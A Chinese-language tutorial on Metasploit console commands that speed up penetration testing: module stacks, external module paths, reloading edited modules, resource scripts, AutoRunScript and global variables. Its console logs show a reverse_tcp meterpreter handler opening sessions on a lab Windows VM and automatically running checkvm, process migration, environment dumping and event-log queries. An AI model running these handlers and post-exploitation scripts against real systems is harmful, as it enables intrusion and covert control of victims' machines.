Metasploit 提高渗透测试速度的指令

1、pushm 和 popm 命令

使用pushm命令可以将当前模块放入模块栈中；

popm命令将位于栈顶部的模块弹出；

注意：这并不是可以用于进程的标准栈，而是Metasploit中一个概念相同的工具——它们并不相同

应用场景

• 在进行两种不同的渗透测试时，为方便两个渗透模块的快速切换，便可用pushm，popm命令

示例

• 使用pushm命令将psexec模块放入栈中，并加载使用exploit/multi/handler模块

• 使用handler完成操作之后，使用popm命令从栈中再次加载psexec模块

2、loadpath 命令

Metasploit的更新会导致自己开发的Metasploit模块在对应文件夹中删除，为避免删除，可以为Metasploit创建一个主目录之外的外部目录，然后从这个外部目录中加载模块。

示例

• 将所有模块都复制到了一个位于桌面的文件夹tests中。
• 需要让tests文件夹的目录结构与Metasploit的目录结构完全相同，加载路径将成为Metasploit目录结构的虚拟分支。

• 将自定义的模块放置到了桌面tests文件夹的exploits/z9m8r8_test目录中。将自定义路径载入到Metasploit之后，就可以使用exploit/z9m8r8_test文件中的模块了

msf5 > loadpath /root/Desktop/tests
Loaded 3 modules:
3 exploit modules
msf5 > use exploit/z9m8r8_test/
use exploit/z9m8r8_test/bsplayer2_68_seh_overflow_z9m8r8
use exploit/z9m8r8_test/pcman_cwd_z9m8r8_test
use exploit/z9m8r8_test/php_utility_belt_remote_code_execution
msf5 > use exploit/z9m8r8_test/

3、reload、edit 和 reload_all 命令

可以使用edit命令动态修改Metasploit中的模块，并在不关闭Metasploit的情况下使用reload命令重新载入编辑过的模块。如果对多个模块进行了修改，就可以在Metasploit中使用reload_all命令一次性载入所有模块。

示例

msf5 > use exploit/z9m8r8_test/pcman_cwd_z9m8r8_test
msf5 exploit(z9m8r8_test/pcman_cwd_z9m8r8_test) > edit

未改之前

对作者进行修改

未重新加载前

重新加载后

 

4、资源脚本的使用方法

使用资源脚本可以免去手动设置选项，实现选项的自动化设置

创建资源脚本有两种方法：手动创建脚本或使用makerc命令创建脚本。

示例（makerc命令）

• makerc命令将之前输入过的所有命令都保存到了一个文件中，可以使用resource命令来使用这个文件

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 10.10.10.156
lhost => 10.10.10.156
msf5 exploit(multi/handler) > set lport 4444
lport => 4444
msf5 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 10.10.10.156:4444
^C[-] Exploit failed [user-interrupt]: Interrupt
[-] exploit: Interrupted
msf5 exploit(multi/handler) > makerc
Usage: makerc <output rc file>

Save the commands executed since startup to the specified file.

msf5 exploit(multi/handler) > makerc multi_hand
[*] Saving last 6 commands to multi_hand ...
msf5 exploit(multi/handler) > back
msf5 > resource multi_hand
[*] Processing /root/multi_hand for ERB directives.
resource (/root/multi_hand)> use exploit/multi/handler
resource (/root/multi_hand)> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
resource (/root/multi_hand)> set lhost 10.10.10.156
lhost => 10.10.10.156
resource (/root/multi_hand)> set lport 4444
lport => 4444
resource (/root/multi_hand)> exploit

[*] Started reverse TCP handler on 10.10.10.156:4444

5、在 Metasploit 中使用 AutoRunScript

通过输入set AutoRunScript[script-name]来设置AutoRunScript的选项，也可以在资源脚本中直接设置

示例1

• 脚本1：multi_script

root@kali:~# more /root/Desktop/muti_script
run post/windows/gather/checkvm
run post/windows/manage/migrate
root@kali:~#

说明：checkvm（检查目标系统是否运行在虚拟环境的模块）和migrate（将攻击载荷迁移到安全进程的模块）模块自动化的后渗透脚本

• 脚本2：resource_complete

root@kali:~# more /root/Desktop/resource_complete
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 10.10.10.156
set lport 4444
set AutoRunScript multi_console_command -r /root/Desktop/muti_script
exploit
root@kali:~#

说明：使用multi_console_command对AutoRunScript进行设置，将multi_console_command设定为-r，这样就允许执行多个后渗透脚本了

运行测试：

msf5 > resource /root/Desktop/resource_complete
[*] Processing /root/Desktop/resource_complete for ERB directives.
resource (/root/Desktop/resource_complete)> use exploit/multi/handler
resource (/root/Desktop/resource_complete)> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
resource (/root/Desktop/resource_complete)> set lhost 10.10.10.156
lhost => 10.10.10.156
resource (/root/Desktop/resource_complete)> set lport 4444
lport => 4444
resource (/root/Desktop/resource_complete)> set AutoRunScript multi_console_command -r /root/Desktop/muti_script
AutoRunScript => multi_console_command -r /root/Desktop/muti_script
resource (/root/Desktop/resource_complete)> exploit

[*] Started reverse TCP handler on 10.10.10.156:4444
[*] Sending stage (179779 bytes) to 10.10.10.131
[*] Meterpreter session 9 opened (10.10.10.156:4444 -> 10.10.10.131:1114) at 2021-10-08 09:03:34 -0400
[*] Sending stage (179779 bytes) to 10.10.10.131
[*] Meterpreter session 10 opened (10.10.10.156:4444 -> 10.10.10.131:1117) at 2021-10-08 09:03:49 -0400
[*] Session ID 9 (10.10.10.156:4444 -> 10.10.10.131:1114) processing AutoRunScript 'multi_console_command -r /root/Desktop/muti_script'
[*] Running Command List ...
[*] Running command run post/windows/gather/checkvm
[*] Session ID 10 (10.10.10.156:4444 -> 10.10.10.131:1117) processing AutoRunScript 'multi_console_command -r /root/Desktop/muti_script'
[*] Running Command List ...
[*] Running command run post/windows/gather/checkvm
[*] Checking if DH-CA8822AB9589 is a Virtual Machine .....
[+] This is a VMware Virtual Machine
[*] Checking if DH-CA8822AB9589 is a Virtual Machine .....
[*] Running command run post/windows/manage/migrate
[+] This is a VMware Virtual Machine
[*] Running command run post/windows/manage/migrate
[*] Running module against DH-CA8822AB9589
[*] Current server process: notepad.exe (1768)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2868
[+] Successfully migrated to process 2868
[*] Running module against DH-CA8822AB9589
[*] Current server process: AcroRd32.exe (2504)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3936
meterpreter >

示例2

• 使用multiscript模块代替multi_console_command模块。来创建一个后渗透脚本

脚本1：multi_script.rc

root@kali:~# more /root/Desktop/muti_script.rc
checkvm
migrate -n explorer.exe
get_env
event_manager -i
root@kali:~#

说明：checkvm（检查目标系统是否运行在虚拟环境的模块）和migrate（将攻击载荷迁移到安全进程的模块）模块自动化的后渗透脚本使用event_manager模块和参数-i可以查看目标系统上的所有日志

脚本2：resource_complete

root@kali:~# more /root/Desktop/resource_complete
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 10.10.10.156
set lport 4444
set AutoRunScript multiscript -r /root/Desktop/muti_script.rc
exploit
root@kali:~#

注意：AutoRunScript参数依旧设定为-r

运行测试：

msf5 > resource /root/Desktop/resource_complete
[*] Processing /root/Desktop/resource_complete for ERB directives.
resource (/root/Desktop/resource_complete)> use exploit/multi/handler
resource (/root/Desktop/resource_complete)> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
resource (/root/Desktop/resource_complete)> set lhost 10.10.10.156
lhost => 10.10.10.156
resource (/root/Desktop/resource_complete)> set lport 4444
lport => 4444
resource (/root/Desktop/resource_complete)> set AutoRunScript multiscript -r /root/Desktop/muti_script.rc
AutoRunScript => multiscript -r /root/Desktop/muti_script.rc
resource (/root/Desktop/resource_complete)> exploit

[*] Started reverse TCP handler on 10.10.10.156:4444
[*] Sending stage (179779 bytes) to 10.10.10.131
[*] Meterpreter session 4 opened (10.10.10.156:4444 -> 10.10.10.131:1072) at 2021-10-08 09:37:42 -0400
[*] Session ID 4 (10.10.10.156:4444 -> 10.10.10.131:1072) processing AutoRunScript 'multiscript -r /root/Desktop/muti_script.rc'
[*] Running Multiscript script.....
[*] Running script List ...
[*] running script checkvm
[!] Meterpreter scripts are deprecated. Try post/windows/gather/checkvm.
[!] Example: run post/windows/gather/checkvm OPTION=value [...]
[*] Checking if target is a Virtual Machine .....
[*] This is a VMware Virtual Machine
[*] running script migrate -n explorer.exe
[!] Meterpreter scripts are deprecated. Try post/windows/manage/migrate.
[!] Example: run post/windows/manage/migrate OPTION=value [...]
[*] Current server process: AcroRd32.exe (3744)
[+] Migrating to 1640
[+] Successfully migrated to process
[*] running script get_env
[!] Meterpreter scripts are deprecated. Try post/multi/gather/env.
[!] Example: run post/multi/gather/env OPTION=value [...]
[*] Getting all System and User Variables

Enviroment Variable list
========================

Name Value
---- -----
APPDATA C:\Documents and Settings\Administrator\Application Data
CLIENTNAME Console
ComSpec C:\WINDOWS\system32\cmd.exe
FP_NO_HOST_CHECK NO
HOMEDRIVE C:
HOMEPATH \Documents and Settings\Administrator
HOMESHARE 仐㰈
ŗ
D
LOGONSERVER \\DH-CA8822AB9589
NUMBER_OF_PROCESSORS 1
OS Windows_NT
PATHEXT .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
PROCESSOR_ARCHITECTURE x86
PROCESSOR_IDENTIFIER x86 Family 6 Model 142 Stepping 11, GenuineIntel
PROCESSOR_LEVEL 6
PROCESSOR_REVISION 8e0b
Path C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem
SESSIONNAME Console
TEMP C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp
TMP C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp
windir C:\WINDOWS

[*] running script event_manager -i
[*] Retriving Event Log Configuration

Event Logs on System
====================

Name Retention Maximum Size Records
---- --------- ------------ -------
Application Disabled 524288K 480
Security Disabled 524288K 0
System Disabled 524288K 881

meterpreter > getuid
Server username: DH-CA8822AB9589\Administrator
meterpreter > getpid
Current pid: 1640
meterpreter > ps

Process List
============

PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
…………
1408 676 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
1640 1620 explorer.exe x86 0 DH-CA8822AB9589\Administrator C:\WINDOWS\Explorer.EXE
1748 1640 VMwareTray.exe x86 0 DH-CA8822AB9589\Administrator C:\Program Files\VMware\VMware Tools\VMwareTray.exe
…………
meterpreter >

6、Metasploit 中的全局变量

使用setg命令可以实现RHOST或者LHOST选项的全局化，让它们可以被所有模块使用

示例

get命令用来显示一个变量的值，而getg命令用来显示一个全局变量的值